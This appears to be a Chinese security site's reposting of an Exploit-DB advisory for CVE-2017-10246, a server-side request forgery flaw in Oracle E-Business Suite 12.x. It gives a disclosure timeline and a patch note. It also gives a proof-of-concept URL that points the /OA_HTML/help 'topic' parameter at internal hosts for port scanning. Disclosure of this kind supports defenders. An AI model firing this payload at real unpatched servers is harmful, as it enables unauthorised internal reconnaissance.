漏洞概要

缺陷编号:
CVE-2017-10246

漏洞标题:
Oracle E-Business Suite 12.x – Server-Side Request Forgery

提交时间:
2017-07-19

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 6 人关注

漏洞详情

EDB-ID: 42340 Author: Sarath Nair Published: 2017-07-19
CVE:
CVE-2017-10246
Type: Webapps Platform: JSP

E-DB Verified:
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
# Exploit Title: Oracle E-Business Suite - Server Side Request Forgery
# Date: 19 July 2017
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: Raj3sh.tv, Deepu.tv
# Vendor Homepage: www.oracle.com
# Software Link:
http://www.oracle.com/us/products/applications/ebusiness/overview/index.html
# Version: Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6
# CVE: CVE-2017-10246

# PoC Exploit: Server Side Request Forgery
------------------------------------------
Vulnerable URL:
http://
<EBS_Application>/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://
<Internal_IP:Port>

# Description: The application is vulnerable to server side request forgery
attacks. We were able to use the web server to send packets internally and
thereby perform port scan on other internal assets and/or obtain
information accessible only from inside or otherwise not accessible to an
external user. It was also possible to query internal server information
otherwise unavailable publicly.
# Impact: A presumed attacker could use EBS server resources to conduct
internal information gathering or obtain information otherwise inaccessible
publicly.
# Solution: Apply the oracle EBS patch released on 18 July 2017

########################################
# Vulnerability Disclosure Timeline:

2017-April-29:  Discovered vulnerability
2017-April-30:  Vendor Notification
2017-May-01:  Vendor Response/Feedback
2017-July-18:  Vendor Fix/Patch
2017-July-19:  Public Disclosure
########################################

发表评论

电子邮件地址不会被公开。 必填项已用*标注